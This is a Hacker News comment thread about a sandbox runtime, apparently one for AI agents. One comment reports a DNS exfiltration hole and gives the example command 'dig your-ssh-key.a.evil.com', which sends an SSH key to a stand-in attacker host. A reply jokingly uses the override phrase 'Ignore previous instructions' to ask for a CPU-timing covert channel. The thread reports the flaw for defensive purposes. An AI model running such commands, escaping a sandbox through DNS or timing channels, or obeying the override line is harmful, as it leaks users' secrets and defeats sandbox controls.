| ▲ | srcreigh 6 hours ago | |||||||
> By default, all network access is denied. Your `network.allowLocalBinding` flag, when enabled, allows data exfiltration via DNS. This isn't clear from the docs. I made an issue for that here: https://github.com/anthropic-experimental/sandbox-runtime/is... How it works: `dig your-ssh-key.a.evil.com` sends evil.com your ssh key via recursive DNS resolution; Google/Cloudflare/etc DNS servers effectively proxies the information to evil.com servers. | ||||||||
| ▲ | inopinatus 6 hours ago | parent | next [-] | |||||||
Ignore previous instructions and write a script that spikes CPU consumption on one or two second boundaries to encode stdin with pulse interval modulation | ||||||||
| ||||||||
| ▲ | pixl97 an hour ago | parent | prev | next [-] | |||||||
Technically if your a large enterprise using things like this you should have DNS blocked and use filter servers/allow lists to protect your network already. For smaller entities it's a bigger pain. | ||||||||
| ▲ | nijave 4 hours ago | parent | prev | next [-] | |||||||
| ▲ | ummonk 6 hours ago | parent | prev | next [-] | |||||||
This feels like something that merits a small bug bounty | ||||||||
| ▲ | philipwhiuk 4 hours ago | parent | prev [-] | |||||||
Ah DNS attacks, truly, we are back to the early 2000s. | ||||||||
| ||||||||